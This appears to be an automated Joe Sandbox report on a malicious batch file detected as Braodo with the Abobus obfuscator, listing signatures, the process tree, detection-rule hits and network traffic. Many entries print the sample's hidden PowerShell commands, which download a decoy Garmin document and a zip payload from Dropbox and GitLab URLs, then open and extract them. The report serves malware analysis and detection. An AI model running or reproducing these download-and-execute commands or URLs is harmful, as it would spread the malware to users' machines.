Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
garsukhjdf11.bat

Overview

General Information

Sample name:garsukhjdf11.bat
Analysis ID:1573653
MD5:92529c13bb6162d355399b1585919e7a
SHA1:f41a93eadc02f2eca672d7b9caf51862cfaff4a1
SHA256:bb4a859dc82bb1e21294e65b574e6fcce8d0ed2cfc36b01028f62a95b09ea8b2
Tags:batbraodostare2user-JAMESWT_MHT
Infos:

Detection

Abobus Obfuscator, Braodo
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Abobus Obfuscator
Yara detected Braodo
Yara detected Powershell download and execute
AI detected suspicious sample
Powershell drops PE file
Sigma detected: PowerShell DownloadFile
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • cmd.exe (PID: 6768 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\garsukhjdf11.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 4052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • chcp.com (PID: 6364 cmdline: chcp.com 437 MD5: 33395C4732A49065EA72590B14B64F32)
    • find.exe (PID: 2316 cmdline: find MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
    • findstr.exe (PID: 6688 cmdline: findstr /L /I set "C:\Users\user\Desktop\garsukhjdf11.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • findstr.exe (PID: 2944 cmdline: findstr /L /I goto "C:\Users\user\Desktop\garsukhjdf11.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • findstr.exe (PID: 3348 cmdline: findstr /L /I echo "C:\Users\user\Desktop\garsukhjdf11.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • findstr.exe (PID: 3572 cmdline: findstr /L /I pause "C:\Users\user\Desktop\garsukhjdf11.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • find.exe (PID: 3200 cmdline: find MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
    • cmd.exe (PID: 1480 cmdline: C:\Windows\system32\cmd.exe /c type tmp MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • cmd.exe (PID: 1972 cmdline: C:\Windows\system32\cmd.exe /c type tmp MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • powershell.exe (PID: 5616 cmdline: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/4p5pc2fbhxx7mz0qnortk/Garmin_Campaign_Information_for_Partners_V3.docx?rlkey=wuzagfqo68p4k9sn4yxo7i950&st=ss9gx9y8&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V3.docx')" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 1436 cmdline: powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V3.docx'" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 6164 cmdline: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/stare2/garmin/-/raw/main/fuknew1112.zip', 'C:\Users\Public\Document.zip')" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 5972 cmdline: powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
garsukhjdf11.batJoeSecurity_AbobusObfuscatorYara detected Abobus ObfuscatorJoe Security
    SourceRuleDescriptionAuthorStrings
    Process Memory Space: powershell.exe PID: 5616JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
      Process Memory Space: powershell.exe PID: 6164JoeSecurity_Braodo_1Yara detected BraodoJoe Security
        Process Memory Space: powershell.exe PID: 6164JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
          SourceRuleDescriptionAuthorStrings
          amsi64_5616.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            amsi64_6164.amsi.csvJoeSecurity_Braodo_1Yara detected BraodoJoe Security
              amsi64_6164.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/4p5pc2fbhxx7mz0qnortk/Garmin_Campaign_Information_for_Partners_V3.docx?rlkey=wuzagfqo68p4k9sn4yxo7i950&st=ss9gx9y8&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V3.docx')", CommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/4p5pc2fbhxx7mz0qnortk/Garmin_Campaign_Information_for_Partners_V3.docx?rlkey=wuzagfqo68p4k9sn4yxo7i950&st=ss9gx9y8&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V3.docx')", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\garsukhjdf11.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6768, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/4p5pc2fbhxx7mz0qnortk/Garmin_Campaign_Information_for_Partners_V3.docx?rlkey=wuzagfqo68p4k9sn4yxo7i950&st=ss9gx9y8&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V3.docx')", ProcessId: 5616, ProcessName: powershell.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/4p5pc2fbhxx7mz0qnortk/Garmin_Campaign_Information_for_Partners_V3.docx?rlkey=wuzagfqo68p4k9sn4yxo7i950&st=ss9gx9y8&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V3.docx')", CommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/4p5pc2fbhxx7mz0qnortk/Garmin_Campaign_Information_for_Partners_V3.docx?rlkey=wuzagfqo68p4k9sn4yxo7i950&st=ss9gx9y8&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V3.docx')", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\garsukhjdf11.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6768, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/4p5pc2fbhxx7mz0qnortk/Garmin_Campaign_Information_for_Partners_V3.docx?rlkey=wuzagfqo68p4k9sn4yxo7i950&st=ss9gx9y8&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V3.docx')", ProcessId: 5616, ProcessName: powershell.exe
                Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6164, TargetFilename: C:\Users\Public\Document.zip
                Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5972, TargetFilename: C:\Users\Public\Document\Scripts\normalizer.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/4p5pc2fbhxx7mz0qnortk/Garmin_Campaign_Information_for_Partners_V3.docx?rlkey=wuzagfqo68p4k9sn4yxo7i950&st=ss9gx9y8&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V3.docx')", CommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/4p5pc2fbhxx7mz0qnortk/Garmin_Campaign_Information_for_Partners_V3.docx?rlkey=wuzagfqo68p4k9sn4yxo7i950&st=ss9gx9y8&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V3.docx')", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\garsukhjdf11.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6768, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/4p5pc2fbhxx7mz0qnortk/Garmin_Campaign_Information_for_Partners_V3.docx?rlkey=wuzagfqo68p4k9sn4yxo7i950&st=ss9gx9y8&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V3.docx')", ProcessId: 5616, ProcessName: powershell.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/4p5pc2fbhxx7mz0qnortk/Garmin_Campaign_Information_for_Partners_V3.docx?rlkey=wuzagfqo68p4k9sn4yxo7i950&st=ss9gx9y8&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V3.docx')", CommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/4p5pc2fbhxx7mz0qnortk/Garmin_Campaign_Information_for_Partners_V3.docx?rlkey=wuzagfqo68p4k9sn4yxo7i950&st=ss9gx9y8&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V3.docx')", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\garsukhjdf11.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6768, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/4p5pc2fbhxx7mz0qnortk/Garmin_Campaign_Information_for_Partners_V3.docx?rlkey=wuzagfqo68p4k9sn4yxo7i950&st=ss9gx9y8&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V3.docx')", ProcessId: 5616, ProcessName: powershell.exe
                Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/4p5pc2fbhxx7mz0qnortk/Garmin_Campaign_Information_for_Partners_V3.docx?rlkey=wuzagfqo68p4k9sn4yxo7i950&st=ss9gx9y8&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V3.docx')", CommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/4p5pc2fbhxx7mz0qnortk/Garmin_Campaign_Information_for_Partners_V3.docx?rlkey=wuzagfqo68p4k9sn4yxo7i950&st=ss9gx9y8&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V3.docx')", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\garsukhjdf11.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6768, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/4p5pc2fbhxx7mz0qnortk/Garmin_Campaign_Information_for_Partners_V3.docx?rlkey=wuzagfqo68p4k9sn4yxo7i950&st=ss9gx9y8&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V3.docx')", ProcessId: 5616, ProcessName: powershell.exe
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/4p5pc2fbhxx7mz0qnortk/Garmin_Campaign_Information_for_Partners_V3.docx?rlkey=wuzagfqo68p4k9sn4yxo7i950&st=ss9gx9y8&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V3.docx')", CommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/4p5pc2fbhxx7mz0qnortk/Garmin_Campaign_Information_for_Partners_V3.docx?rlkey=wuzagfqo68p4k9sn4yxo7i950&st=ss9gx9y8&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V3.docx')", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\garsukhjdf11.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6768, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/4p5pc2fbhxx7mz0qnortk/Garmin_Campaign_Information_for_Partners_V3.docx?rlkey=wuzagfqo68p4k9sn4yxo7i950&st=ss9gx9y8&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V3.docx')", ProcessId: 5616, ProcessName: powershell.exe
                No Suricata rule has matched

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 93.3% probability
                Source: unknownHTTPS traffic detected: 162.125.69.18:443 -> 192.168.2.5:49706 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.65.251.78:443 -> 192.168.2.5:65363 version: TLS 1.2
                Source: Binary string: \??\C:\Windows\System.Core.pdbX source: powershell.exe, 0000000C.00000002.2168861605.0000028C26756000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Management.Automation.pdbFg source: powershell.exe, 0000000C.00000002.2169790015.0000028C26991000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\Vinay\Projects\simple_launcher\dist\t64.pdb source: powershell.exe, 00000011.00000002.3326115686.0000022300F38000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3326115686.00000223015CC000.00000004.00000800.00020000.00000000.sdmp, pip3.12.exe.17.dr
                Source: Binary string: @$(CPY) "$(OUT_DIR)\*.pdb" "$(LIB_INSTALL_DIR)\" source: powershell.exe, 00000011.00000002.3326115686.000002230169A000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000C.00000002.2168861605.0000028C266EF000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 0000000C.00000002.2169790015.0000028C269A9000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Core.pdb source: powershell.exe, 0000000C.00000002.2169790015.0000028C26991000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000C.00000002.2168861605.0000028C26769000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Windows\System.pdbpdbtem.pdbB source: powershell.exe, 0000000C.00000002.2168861605.0000028C26756000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbO source: powershell.exe, 0000000C.00000002.2168861605.0000028C266EF000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: *.pdbz source: powershell.exe, 0000000C.00000002.2153558722.0000028C0C76B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.pdb source: powershell.exe, 0000000C.00000002.2169790015.0000028C26991000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbH source: powershell.exe, 0000000C.00000002.2169790015.0000028C26960000.00000004.00000020.00020000.00000000.sdmp
                Source: global trafficHTTP traffic detected: GET /scl/fi/4p5pc2fbhxx7mz0qnortk/Garmin_Campaign_Information_for_Partners_V3.docx?rlkey=wuzagfqo68p4k9sn4yxo7i950&st=ss9gx9y8&dl=1 HTTP/1.1Host: www.dropbox.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /stare2/garmin/-/raw/main/fuknew1112.zip HTTP/1.1Host: gitlab.comConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 172.65.251.78 172.65.251.78
                Source: Joe Sandbox ViewIP Address: 162.125.69.18 162.125.69.18
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /scl/fi/4p5pc2fbhxx7mz0qnortk/Garmin_Campaign_Information_for_Partners_V3.docx?rlkey=wuzagfqo68p4k9sn4yxo7i950&st=ss9gx9y8&dl=1 HTTP/1.1Host: www.dropbox.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /stare2/garmin/-/raw/main/fuknew1112.zip HTTP/1.1Host: gitlab.comConnection: Keep-Alive
                Source: powershell.exe, 0000000C.00000002.2154119672.0000028C0FC7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Policy: frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; img-src https://* data: blob: ; media-src https://* blob: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; frame-ancestors 'self' https://*.dropbox.com ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; font-src https://* data: ; base-uri 'self' ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker equals www.yahoo.com (Yahoo)
                Source: powershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: api-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; img-src https://* data: blob: ; media-src https://* blob: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; frame-ancestors 'self' https://*.dropbox.com ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; font-src https://* data: ; base-uri 'self' ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker equals www.yahoo.com (Yahoo)
                Source: powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; img-src https://* data: blob: ; media-src https://* blob: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; frame-ancestors 'self' https://*.dropbox.com ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; font-src https://* data: ; base-uri 'self' ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ 